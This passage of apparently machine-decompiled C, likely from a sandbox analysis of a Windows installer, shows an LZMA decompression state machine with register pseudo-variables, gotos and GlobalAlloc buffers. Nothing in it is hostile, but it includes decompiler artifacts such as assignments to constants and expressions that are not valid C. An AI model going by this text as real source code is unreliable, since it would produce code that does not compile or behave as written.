							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M0040717D))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
